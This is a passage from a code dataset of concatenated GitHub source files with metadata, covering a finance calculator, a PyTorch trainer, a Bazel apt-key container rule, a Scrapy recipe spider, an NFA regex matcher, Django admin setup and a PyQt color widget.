f.write(f'{u.name},{u.mail},{message[:-1]}'+'\\n')","repo_name":"minaessam2015/Secret-Santa-Game","sub_path":"User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31896257354","text":"#request user to select investment or bond\r\n#researched how to get python to ignore capitalization, therefore created variables for each option\r\n#used if statement for both selections\r\n#in each selection included the criteria\r\n#used nested if statement if the user selected compound or simple interest\r\n#for simple interest researched the net and swapped the formula around to divide interest by 100\r\n#else if statement included if user selected compound interest\r\n#else if statement used if user selected bond\r\n#multiplied interest_rate by (1/12) since interest calc should be monthly\r\n#else statement should the user make an incorrect selection\r\n\r\n\r\n\r\nimport math\r\n\r\ninput_type=input(\"Choose either 'investment' or 'bond' from the menu below to proceed:\\n\\ninvestment - to calculate the amount of interest you will earn on investment\\nbond - to calculate the amount you will have to pay on a home loan\\n\") \r\nstring_type1=\"investment\"\r\nstring_type2=\"Investment\"\r\nstring_type3=\"INVESTMENT\"\r\nstring_type4=\"bond\"\r\nstring_type5=\"Bond\"\r\nstring_type6=\"BOND\"\r\n\r\nif input_type.lower()==string_type1.lower() or input_type.upper()==string_type3.upper() or input_type==string_type2:\r\n    print(\"Thank you\")\r\n    dep_amount = int(input(\"enter your deposit amount here: R \"))\r\n    interest_rate = int(input(\"enter your preferred interest rate (%): \"))\r\n    invest_period = int(input(\"enter your preferred investment period in years: \"))\r\n    interest = input(\"enter your 
interest choice here simple or compound: \")\r\n    if interest==\"simple\":\r\n        interest_calc=round((dep_amount*interest_rate*invest_period)/100+dep_amount)\r\n        print(\"The amount you will receive after {} years is R{}\".format(invest_period,interest_calc))\r\n    elif interest==\"compound\":\r\n        interest_calc=round(dep_amount*math.pow((1+interest_rate/100),invest_period))\r\n        print(\"The amount you will receive after {} years is R{}\".format(invest_period,interest_calc))\r\nelif input_type.lower()==string_type4.lower() or input_type.upper()==string_type6.upper() or input_type==string_type5:\r\n    interest_rate = int(input(\"enter your preferred interest rate (%): \"))/100*(1/12)\r\n    PV = int(input(\"enter the present value of the house: R \"))\r\n    bond_period = int(input(\"enter number of months you plan to pay off bond: \"))\r\n    repayment=round((interest_rate*PV)/(1-(1+(interest_rate))**(-bond_period)))\r\n    print(\"Your monthly payment is: R{}\".format(repayment))\r\nelse:\r\n    print(\"Invalid option. Please select investment or bond\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"amy786zn/Finance-Calculator","sub_path":"finance_calculator.py","file_name":"finance_calculator.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"14809068009","text":"import functools\nimport time\nfrom abc import ABC, abstractmethod\n\nimport torch\n\nfrom metrics.MetricsLogger import MetricsLogger\n\n\nclass TrainerBase(ABC):\n    BATCH_LEVEL_METRIC = \"batch_level_metric\"\n    BATCH_ALL = \"batch_all\"\n    FORWARD_METRIC = \"forward_metric\"\n    FORWARD_PASS = \"forward_pass\"\n    BACKWARD_METRIC = \"backward_metric\"\n    BACKWARD = \"backward\"\n\n    def __init__(self, rank):\n        r\"\"\"\n        Inits TrainerBase class.\n        Args:\n            rank (int): worker rank\n        \"\"\"\n        self.__metrics_logger = MetricsLogger(rank)\n\n    @abstractmethod\n    def train(self):\n        r\"\"\"\n        A method to be implemented by child class that will train a neural network.\n        \"\"\"\n        return\n\n    def record_start(self, type, key, name, cuda=True):\n        r\"\"\"\n        A method that records the start event for a metric.\n        Args:\n            type (str): group id for metric\n            key (str): unique id for metric within a group\n            name (str): description of the metric\n            cuda (bool): indicator to determine if this is a CUDA metric\n        \"\"\"\n        self.__metrics_logger.record_start(type, key, name, cuda)\n\n    def record_end(self, type, key):\n        r\"\"\"\n        A method that records the end event for a metric.\n        Args:\n            type (str): group id for metric\n            key (str): unique id for metric within a group\n        \"\"\"\n        self.__metrics_logger.record_end(type, key)\n\n    def record_batch_start(self, key, cuda=True):\n        r\"\"\"\n        A helper method that records a batch metric for the\n        given key. A user should call this at the start of an\n        iteration step during training.\n        Args:\n            key (str): unique id for metric within a group\n            cuda (bool): indicator to determine if this is a CUDA metric\n        \"\"\"\n        self.__metrics_logger.record_start(\n            self.BATCH_LEVEL_METRIC, key, self.BATCH_ALL, cuda\n        )\n\n    def record_batch_end(self, key):\n        r\"\"\"\n        A helper method that records a batch metric for the\n        given key. 
A user should call this at the end of an\n iteration step during training.\n Args:\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(self.BATCH_LEVEL_METRIC, key)\n\n def record_forward_start(self, key, cuda=True):\n r\"\"\"\n A helper method that records a forward metric\n for the given key. A user should call this before\n their neural network forward.\n Args:\n key (str): unique id for metric within a group\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n self.__metrics_logger.record_start(\n self.FORWARD_METRIC, key, self.FORWARD_PASS, cuda\n )\n\n def record_forward_end(self, key):\n r\"\"\"\n A helper method that records a forward metric\n for the given key. A user should call this after their\n neural network forward.\n Args:\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(self.FORWARD_METRIC, key)\n\n def record_backward_start(self, key, cuda=True):\n r\"\"\"\n A helper method that records a backward metric\n for the given key. A user should call this before\n their .backward() call.\n Args:\n key (str): unique id for metric within a group\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n self.__metrics_logger.record_start(\n self.BACKWARD_METRIC, key, self.BACKWARD, cuda\n )\n\n def record_backward_end(self, key):\n r\"\"\"\n A helper method that records a backward metric\n for the given key. A user should call this after\n .backward().\n Args:\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(self.BACKWARD_METRIC, key)\n\n @staticmethod\n def methodmetric(name, type=\"method_metric\", cuda=True):\n r\"\"\"\n A decorator that records a metric for the decorated method.\n Args:\n name (str): description of the metric\n type (str): group id for metric\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n\n def decorator(function):\n @functools.wraps(function)\n def wrapper(self, *args):\n key = time.time()\n self.__metrics_logger.record_start(type, key, name, cuda)\n result = function(self, *args)\n self.__metrics_logger.record_end(type, key)\n return result\n\n return wrapper\n\n return decorator\n\n def get_metrics(self):\n r\"\"\"\n A method that returns metrics captured by the __metrics_logger.\n \"\"\"\n return self.__metrics_logger.get_processed_metrics()\n\n def clear_metrics(self):\n r\"\"\"\n A method that clears __metrics_logger recorded metrics.\n \"\"\"\n return self.__metrics_logger.clear_metrics()\n\n\nclass DdpTrainer(TrainerBase):\n def __init__(\n self,\n process_group,\n use_cuda_rpc,\n server_rref,\n backend,\n epochs,\n preprocess_data,\n create_criterion,\n create_ddp_model,\n hook_state_class,\n hook,\n iteration_step,\n ):\n r\"\"\"\n A trainer that implements a DDP training algorithm using a simple hook that performs allreduce\n using the process_group implementation.\n Args:\n process_group (ProcessGroup): distributed process group\n use_cuda_rpc (bool): indicator for CUDA RPC\n server_rref (RRef): remote reference to the server\n backend (str): distributed communication backend\n epochs (int): epoch count for training\n preprocess_data (function): preprocesses data passed\n to the trainer before starting training\n create_criterion (function): creates a criterion to calculate loss\n create_ddp_model (function): creates a ddp model for the trainer\n hook_state_class (class): class that will be used to keep tracking of state\n during training.\n hook (function): 
ddp communication hook\n iteration_step (function): will perform 1 step of training\n \"\"\"\n super().__init__(process_group.rank())\n self.process_group = process_group\n self.use_cuda_rpc = use_cuda_rpc\n self.server_rref = server_rref\n self.backend = backend\n self.epochs = epochs\n self.preprocess_data = preprocess_data\n self.create_criterion = create_criterion\n self.create_ddp_model = create_ddp_model\n self.hook_state_class = hook_state_class\n self.hook = hook\n self.iteration_step = iteration_step\n\n self.rank = process_group.rank()\n self.trainer_count = process_group.size()\n\n def epoch_key(self, epoch, index):\n r\"\"\"\n A method that returns an encoded key that represents the current epoch and\n iteration index.\n Args:\n epoch (int): epoch index\n index (int): iteration index\n \"\"\"\n return f\"{epoch},{index}\"\n\n def train(self, model, data):\n r\"\"\"\n A method that implements the training algorithm.\n Args:\n model (nn.Module): neural network model\n data (list): training examples\n \"\"\"\n model = model.cuda(self.rank)\n data = self.preprocess_data(self.rank, data)\n criterion = self.create_criterion(self.rank)\n ddp_model, hook_state = self.create_ddp_model(\n self, self.rank, model, self.process_group, self.hook_state_class, self.hook\n )\n optimizer = torch.optim.SGD(ddp_model.parameters(), 1e-4)\n\n for epoch in range(self.epochs):\n if epoch % 5 == 0 and self.rank == 0:\n print(f\"train epoch={epoch}\")\n for index, batch in enumerate(data):\n self.iteration_step(\n self,\n ddp_model,\n criterion,\n optimizer,\n hook_state,\n epoch,\n index,\n batch,\n )\n torch.cuda.synchronize(self.rank)\n","repo_name":"pytorch/pytorch","sub_path":"benchmarks/distributed/rpc/parameter_server/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"72229627753","text":"load(\"//container:container.bzl\", _container = \"container\")\nload(\"//docker/util:run.bzl\", _extract = \"extract\")\n\ndef _impl(\n ctx,\n name = None,\n keys = None,\n image_tar = None,\n gpg_image = None,\n output_executable = None,\n output_tarball = None,\n output_layer = None,\n output_digest = None,\n output_config = None,\n output_config_digest = None):\n \"\"\"Implementation for the add_apt_key rule.\n\n Args:\n ctx: The bazel rule context\n name: str, overrides ctx.label.name\n keys: File list, overrides ctx.files.keys\n image_tar: File, overrides ctx.file.image\n gpg_image: File, overrides ctx.file.gpg_image\n output_executable: File to use as output for script to load docker image,\n overrides ctx.outputs.executable\n output_tarball: File, overrides ctx.outputs.out\n output_layer: File, overrides ctx.outputs.layer\n output_digest: File, overrides ctx.outputs.digest\n output_config: File, overrides ctx.outputs.config\n output_config_digest: File, overrides ctx.outputs.config_digest\n \"\"\"\n name = name or ctx.label.name\n keys = keys or ctx.files.keys\n image_tar = image_tar or ctx.file.image\n gpg_image = gpg_image or ctx.file.gpg_image\n output_executable = output_executable or ctx.outputs.build_script\n output_tarball = output_tarball or ctx.outputs.out\n output_layer = output_layer or ctx.outputs.layer\n output_digest = output_digest or ctx.outputs.digest\n output_config = output_config or ctx.outputs.config\n output_config_digest = output_config_digest or ctx.outputs.config_digest\n\n # First build an image capable of adding an apt-key.\n # 
This requires the keyfile and the \"gnupg\" package.\n\n    # If the user specified an alternate base for this, use it.\n    # Otherwise use the same base image we want the key in.\n\n    if gpg_image == None:\n        gpg_image = image_tar\n\n    key_image = \"%s.key\" % name\n    key_image_output_executable = ctx.actions.declare_file(\"%s\" % key_image)\n    key_image_output_tarball = ctx.actions.declare_file(\"%s.tar\" % key_image)\n    key_image_output_layer = ctx.actions.declare_file(\"%s-layer.tar\" % key_image)\n    key_image_output_digest = ctx.actions.declare_file(\"%s.digest\" % key_image)\n    key_image_output_config = ctx.actions.declare_file(\"%s.json\" % key_image)\n    key_image_output_config_digest = ctx.actions.declare_file(\"%s.json.sha256\" % key_image)\n\n    key_image_result = _container.image.implementation(\n        ctx,\n        name = key_image,\n        base = gpg_image,\n        directory = \"/gpg\",\n        files = keys,\n        output_executable = key_image_output_executable,\n        output_tarball = key_image_output_tarball,\n        output_layer = key_image_output_layer,\n        output_digest = key_image_output_digest,\n        output_config = key_image_output_config,\n        output_config_digest = key_image_output_config_digest,\n    )\n\n    commands = [\n        \"apt-get update\",\n        \"apt-get install -y -q gnupg\",\n        # Put keys in a special directory and use glob.\n        \"for file in /gpg/*; do apt-key add \\\\$file; done\",\n    ]\n    extract_file_name = \"/etc/apt/trusted.gpg\"\n    extract_file_out = ctx.actions.declare_file(name + \"-trusted.gpg\")\n\n    _extract.implementation(\n        ctx,\n        name = name,\n        image = key_image_output_tarball,\n        commands = commands,\n        extract_file = extract_file_name,\n        output_file = extract_file_out,\n        script_file = ctx.actions.declare_file(name + \".build\"),\n    )\n\n    # Build the final image with additional gpg keys in it.\n\n    return _container.image.implementation(\n        ctx,\n        name = name,\n        base = image_tar,\n        directory = \"/etc/apt/trusted.gpg.d/\",\n        files = [extract_file_out],\n        output_executable = output_executable,\n        output_tarball = output_tarball,\n        output_layer = output_layer,\n        output_digest = output_digest,\n        output_config = output_config,\n        output_config_digest = output_config_digest,\n    )\n\n_attrs = dict(_container.image.attrs)\n_attrs.update(_extract.attrs)\n_attrs.update({\n    # Redeclare following attributes of _extract to be non-mandatory.\n    \"commands\": attr.string_list(\n        doc = \"Redeclared from _extract to be non-mandatory, do not set.\",\n    ),\n    \"extract_file\": attr.string(\n        doc = \"Redeclared from _extract to be non-mandatory, do not set.\",\n    ),\n    \"gpg_image\": attr.label(\n        doc = (\"If set, keys will be pulled and installed in the given image, \" +\n               \"the result of this installation will then be transferred to \" +\n               \"the image passed as base\"),\n        allow_single_file = True,\n    ),\n    \"keys\": attr.label_list(\n        allow_files = True,\n        doc = \"List of keys (each, a file target) to be installed in the container.\",\n        mandatory = True,\n    ),\n    \"output_file\": attr.string(\n        doc = \"Redeclared from _extract to be non-mandatory, do not set.\",\n    ),\n})\n\n_outputs = _container.image.outputs\n\n# Export add_apt_key rule for other bazel rules to depend on.\nkey = struct(\n    attrs = _attrs,\n    outputs = _outputs,\n    implementation = _impl,\n    cfg = _container.image.cfg,\n)\n\nadd_apt_key = rule(\n    attrs = key.attrs,\n    outputs = key.outputs,\n    implementation = key.implementation,\n    toolchains = [\"@io_bazel_rules_docker//toolchains/docker:toolchain_type\"],\n    executable = True,\n    cfg = 
key.cfg,\n)\n","repo_name":"bazelbuild/rules_docker","sub_path":"docker/package_managers/apt_key.bzl","file_name":"apt_key.bzl","file_ext":"bzl","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":1059,"dataset":"github-code","pt":"72"} +{"seq_id":"33989001951","text":"import scrapy\n\nclass NdtvRecipeSpider(scrapy.Spider):\n\tname = 'v5rp/la-biryaneez-chalet'\n\tstart_urls = ['http://food.ndtv.com/recipes/chicken-recipes']\n\n\tdef parse(self,response):\n\t\tfor title in response.css('li.main_image'):\n\t\t\tlink = title.css('a::attr(\"href\")').extract_first().rstrip() \n\t\t\tyield scrapy.Request(link, callback=self.parse_attr)\n\t\tfor links in response.css('span.pagination'):\n\t\t\tprint(links.css('a::text').extract_first())\n\t\t\tif(links.css('a::text').extract_first() == 'Next »'):\n\t\t\t\tyield response.follow(links.css('a::attr(\"href\")').extract_first(),self.parse)\n\n\tdef parse_attr(self,response):\n\t\tingredients = response.css('div.keyword_tag')\n\t\tfor ingredient in ingredients.css('a::text'):\n\t\t\tprint(ingredient.extract())\n\t\t\tyield {'ingredient' : ingredient.extract()}\n","repo_name":"alter-sachin/pythonscraper","sub_path":"ndtvRecipeScrapper.py","file_name":"ndtvRecipeScrapper.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5181001091","text":"import os\nimport glob\nimport time\nimport asyncio\nimport logging\nimport kubism\n\ndeploy = kubism.deploy\n\n\nclass temp_server(deploy.Server):\n\n\n def __init__(self):\n super().__init__()\n self._Temp_C = None\n self.map_attr('Temp_C', 'Temp_F')\n print('Setting Callback')\n self.set_callback(self.respond_temp)\n\n\n async def respond_temp(self, *args):\n temp_c, temp_f = read_temp()\n temp_string = f'Temp: {temp_c} C, {temp_f} F'\n print(temp_string)\n await self.respond_async(temp_string.encode())\n\n\n @property\n def Temp_C(self):\n pass\n\n\n def update_state(self):\n pass\n\n\n# Assume we've mapped the device folder to /app\n# and its where this file is located\ndevice_folder = glob.glob('/sys/bus/w1/devices/28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n\ndef read_temp():\n print('Reading Temp')\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n return temp_c, temp_f\n\n\n\ndef main():\n print('Starting Server')\n temp = temp_server()\n asyncio.run(temp.listen_async())\n\n\nif __name__ == '__main__':\n main()","repo_name":"regananalytics/kubism.dev","sub_path":"examples/py/therm.py","file_name":"therm.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42739163065","text":"from DirectedDFS import DirectedDFS\nimport matplotlib.pyplot as plt\nimport string\nimport math\nfrom fundamentals.directed_graphs.DiGraph import DiGraph\n\n\nclass NFA:\n def __init__(self, reg_exp):\n assert len(reg_exp) >= 2 and reg_exp[0] == '(' and reg_exp[-1] == ')'\n self.reg_exp = reg_exp\n self.meta_chars = set('()*|')\n\n self.digraph = self.build_epsilon_transition_digraph()\n return\n\n def recognizes(self, text):\n # Simulation of NFA\n m = 
len(self.reg_exp)\n n = len(text)\n\n # Start at state 0\n # Get reachable states from start, even before scanning any character from the text\n dfs = DirectedDFS(self.digraph, [0])\n states = [x for x in range(m + 1) if dfs.marked(x)]\n\n for idx in range(n):\n # Scan text\n matched = list()\n for v in states:\n if self.reg_exp[v] == '.' or self.reg_exp[v] == text[idx]:\n matched.append(v + 1)\n\n # Make epsilon transitions\n dfs = DirectedDFS(self.digraph, matched)\n states = [x for x in range(m+1) if dfs.marked(x)]\n\n return m in states\n\n def build_epsilon_transition_digraph(self):\n # Construction of NFA\n m = len(self.reg_exp)\n digraph = DiGraph(m + 1)\n stack = list()\n\n for i in range(m):\n curr_char = self.reg_exp[i]\n\n if curr_char not in self.meta_chars:\n # Alphabet or .\n # digraph.add_edge(i, i+1)\n if i < m-1 and self.reg_exp[i + 1] == '*':\n digraph.add_edge(i, i+1)\n digraph.add_edge(i+1, i)\n else:\n # Process each metacharacter appropriately\n if curr_char == '(':\n digraph.add_edge(i, i+1)\n stack.append(i)\n elif curr_char == '|':\n stack.append(i)\n elif curr_char == '*':\n digraph.add_edge(i, i+1)\n else:\n digraph.add_edge(i, i+1)\n if len(stack) == 1:\n # No | in between\n op_loc = stack.pop()\n else:\n # | in between\n or_loc = stack.pop()\n op_loc = stack.pop()\n\n digraph.add_edge(op_loc, or_loc + 1)\n digraph.add_edge(or_loc, i)\n\n if i < m-1 and self.reg_exp[i + 1] == '*':\n digraph.add_edge(op_loc, i + 1)\n digraph.add_edge(i + 1, op_loc)\n\n return digraph\n\n\nif __name__ == '__main__':\n rexp = '((a*b|ac)*d)'\n nfa = NFA(rexp)\n\n m = len(rexp)\n\n vertex_point_map = dict()\n sorted_vertices = list(range(m + 1))\n points = DiGraph._get_circle_points([0.5, 0.5], 0.4, 2 * m + 1)\n vertex_point_map = dict(zip(sorted_vertices[::-1], points))\n # vertex_point_map = dict(zip(list(range(m + 1)), [[idx * 0.5, 0.0] for idx in range(m+1)]))\n\n fig, ax = plt.subplots(1, 1, figsize=(8, 8))\n nfa.digraph.plot(ax, 'o', 'k', 'r', vertex_point_map=vertex_point_map, texts=rexp + '$')\n plt.show()\n\n texts = ['abd', 'bd', 'bacd', 'aaabd', 'aaabac', 'aaabacd']\n for text in texts:\n print(f\"{text} {nfa.recognizes(text)}\")","repo_name":"gsravank/ds_algo","sub_path":"fundamentals/regular_expressions/NFA.py","file_name":"NFA.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25643570062","text":"from django.contrib import admin\n\nfrom .models import Category, Genre, Title, GenreTitle, Review, Comment\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'name',\n 'slug',\n )\n search_fields = ('name',)\n list_filter = ('name',)\n prepopulated_fields = {'slug': ('name',)}\n empty_value_display = '-пусто-'\n\n\nclass GenreAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'name',\n 'slug',\n )\n search_fields = ('name',)\n list_filter = ('name',)\n prepopulated_fields = {'slug': ('name',)}\n empty_value_display = '-пусто-'\n\n\nclass TitleAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'name',\n 'year',\n 'description',\n 'category',\n )\n search_fields = ('name', 'year', 'category')\n list_filter = ('name',)\n empty_value_display = '-пусто-'\n\n\nclass GenreTitleAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'title_id',\n 'genre_id',\n )\n search_fields = ('title',)\n empty_value_display = '-пусто-'\n\n\nclass ReviewAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'text',\n 'author',\n 'score',\n 'pub_date',\n )\n 
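# Admin search is keyed on the review author.\n    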
search_fields = ('author',)\n empty_value_display = '-пусто-'\n\n\nclass CommentAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'text',\n 'author',\n 'pub_date',\n 'review',\n )\n search_fields = ('author', 'review',)\n empty_value_display = '-пусто-'\n\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Genre, GenreAdmin)\nadmin.site.register(Title, TitleAdmin)\nadmin.site.register(GenreTitle, GenreTitleAdmin)\nadmin.site.register(Review, ReviewAdmin)\nadmin.site.register(Comment, CommentAdmin)\n","repo_name":"Adelina1231/api_yamdb","sub_path":"api_yamdb/reviews/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25398893047","text":"import datetime as dt\nimport schedule\n\n\ndef job():\n time = dt.datetime.now()\n time = time.hour % 12\n print(\"ку \" * int(time))\n\n\nschedule.every().hour.at(\":00\").do(job)\n\nwhile True:\n schedule.run_pending()\n \n","repo_name":"jeley0/semester_36","sub_path":"Modern_applications/Lab1/lab1.6.py","file_name":"lab1.6.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27188913194","text":"# acc_cv2.py\n#\n# Author: Adam Sandler\n# Date: 10/18/18\n#\n# Computes accuracy for each CV, returns plot in /plots/ folder, and\n# mean, stDev, and p-value for both train & validation sets\n# - uses csv from no-decomposition\n#\n# Uses CV data\n#\n# Dependencies:\n# Packages: matplotlib, numpy, pandas, scipy, sklearn\n# Data: asdHBTucker\n\nimport numpy as np\nfrom scipy import stats\nimport pandas as pd\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import SelectFpr\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.decomposition import PCA\nfrom sklearn.exceptions import ConvergenceWarning\nfrom hmap import heatmap\nfrom warnings import filterwarnings\n\n\ndef acc(classifier, fname, labelF, indF, splits=10, fselect='None', nfeat=100, featmin=3, a=.05, header=True,\n hmap=False, f=True):\n\n if f:\n filterwarnings(\"ignore\", category=ConvergenceWarning)\n acc = []\n acc_tr = []\n\n # load data\n if header:\n cts = pd.read_csv(fname + '.csv', header=0, index_col=0, dtype={0: str})\n else:\n cts = pd.read_csv(fname + '.csv', header=None, index_col=None)\n ind = pd.read_csv(indF + '.csv', header=None)\n label = pd.read_csv(labelF + '.csv', header=0, index_col=0)\n rows = np.where(ind > 0)[0]\n if cts.shape[0] == len(rows):\n phi = cts\n else:\n phi = cts.iloc[rows]\n cancer = label.iloc[rows, 0]\n ind = ind.iloc[rows, 0]\n\n i = 0\n for i in range(0, splits):\n\n rows = np.where(ind != i + 1)\n X = phi.iloc[rows]\n s = X.shape\n if len(s) == 3:\n X = np.reshape(X, [s[0], s[1] * s[2]])\n else:\n X = np.reshape(X, [s[0], s[1]])\n y = cancer.iloc[rows]\n y = np.reshape(y, s[0])\n rows = np.where(ind == i + 1)\n X_test = phi.iloc[rows]\n s = X_test.shape\n if len(s) == 3:\n X_test = np.reshape(X_test, [s[0], s[1] * s[2]])\n else:\n X_test = np.reshape(X_test, [s[0], s[1]])\n y_test = cancer.iloc[rows]\n y_test = np.reshape(y_test, s[0])\n\n # subset features\n if 'min' in fselect:\n cols = np.where(X.astype(bool).sum(axis=0) > featmin)[0]\n X = X.iloc[:, cols]\n X_test = X_test.iloc[:, cols]\n\n if 'MI' in fselect:\n model = SelectKBest(mutual_info_classif, k=nfeat).fit(X, y)\n X = model.transform(X)\n 
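# Reuse the transform fitted on the training fold for the held-out fold.\n            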
X_test = model.transform(X_test)\n elif 'PCA'in fselect:\n model = PCA(n_components=nfeat).fit(X)\n X = model.transform(X)\n X_test = model.transform(X_test)\n elif 'reg' in fselect:\n model = SelectFpr(f_classif, alpha=a).fit(X, y)\n X = model.transform(X)\n X_test = model.transform(X_test)\n\n if hmap:\n heatmap(X, y, tail='_{0}_train'.format(i))\n heatmap(X_test, y_test, tail='_{0}_test'.format(i))\n\n # fit model\n model = classifier.fit(X, y)\n\n # Compute accuracy for validation set\n probas_ = model.predict_proba(X_test)\n y_hat = np.argmax(probas_, axis=1)\n acc.append(sum(y_hat == y_test)/len(y_test))\n\n # Compute accuracy for training set\n probas_ = model.predict_proba(X)\n y_hat = np.argmax(probas_, axis=1)\n acc_tr.append(sum(y_hat == y) / len(y))\n\n i += 1\n\n results = stats.ttest_1samp(acc, popmean=755/2126)\n p_val = results[1]\n\n results = stats.ttest_1samp(acc_tr, popmean=755/2126)\n p_val_tr = results[1]\n\n return np.mean(acc), np.std(acc), p_val, np.mean(acc_tr), np.std(acc_tr), p_val_tr\n","repo_name":"ars2240/asdHBTucker","sub_path":"acc_cv2.py","file_name":"acc_cv2.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21651860416","text":"# -*- coding: utf-8 -*-\n########################################################################\n#\n# (c) 2009-2013 Markus Dittrich\n#\n# This program is free software; you can redistribute it\n# and/or modify it under the terms of the GNU General Public\n# License Version 3 as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License Version 3 for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program; if not, write to the Free\n# Software Foundation, Inc., 59 Temple Place - Suite 330,\n# Boston, MA 02111-1307, USA.\n#\n#######################################################################\n\nfrom PyQt4.QtCore import (QObject, \n Qt, \n SIGNAL)\n\nfrom PyQt4.QtGui import (QColor, \n QColorDialog,\n QFrame, \n QHBoxLayout,\n QPushButton,\n QWidget) \n\n\n\n#########################################################\n## \n## class for managing the color selection widget\n##\n#########################################################\nclass ColorWidget(QWidget):\n\n def __init__(self, parent = None):\n\n super(ColorWidget, self).__init__(parent)\n\n\n def initialize(self, synchronizer, colors):\n\n self._synchronizer = synchronizer\n \n # set up layout\n layout = QHBoxLayout()\n\n # we need to keep a list of all ColorSelectorItems so we can\n # parse them later for their colors when saving as spf\n # or set their color when loading an spf.\n self.colorWidgets = []\n for color in colors:\n newItem = ColorSelectorItem(color, synchronizer)\n layout.addWidget(newItem)\n self.colorWidgets.append(newItem)\n if color == QColor(Qt.white):\n synchronizer.select(newItem)\n\n colorButton = QPushButton(\"customize color\")\n QObject.connect(colorButton, SIGNAL(\"pressed()\"),\n self.customized_color_button_pressed)\n layout.addWidget(colorButton)\n layout.addStretch()\n \n self.setLayout(layout)\n\n\n def customized_color_button_pressed(self):\n \"\"\" \n Deal with user requests to customize colors.\n \"\"\"\n\n oldColor = self._synchronizer.get_active_widget().color\n color = QColorDialog.getColor(oldColor, None,\n \"Select Custom Color\")\n\n if color.isValid():\n self._synchronizer.change_active_color(color)\n\n\n\n def get_all_colors(self):\n \"\"\" Returns a list with of (color, state) tuples currently available\n as ColorSelectorItems.\n\n The state it 1 if the item is active and 0 for the inactive rest.\n \"\"\"\n\n activeWidget = self._synchronizer.get_active_widget()\n allColors = []\n for item in self.colorWidgets:\n state = 1 if item == activeWidget else 0\n allColors.append((item.color, state))\n\n return allColors\n \n\n\n\n#########################################################\n## \n## class for managing a single symbol selector item\n##\n#########################################################\nclass ColorSelectorItem(QFrame):\n\n def __init__(self, color, synchronizer, parent = None):\n\n super(ColorSelectorItem, self).__init__(parent)\n\n self._synchronizer = synchronizer\n self.itemColor = QColor(color)\n\n # define and set stylesheets\n self.define_stylesheets() \n self.setStyleSheet(self._unselectedStyleSheet)\n self.selected = False\n\n self.setMinimumHeight(40)\n self.setMaximumHeight(40)\n self.setMinimumWidth(40)\n self.setMaximumWidth(40)\n\n \n @property\n def color(self):\n \"\"\" Returns the color content controled by this widget. \"\"\"\n\n return self.itemColor\n\n\n\n @color.setter\n def color(self, color):\n \"\"\" Sets the current color of the selector. 
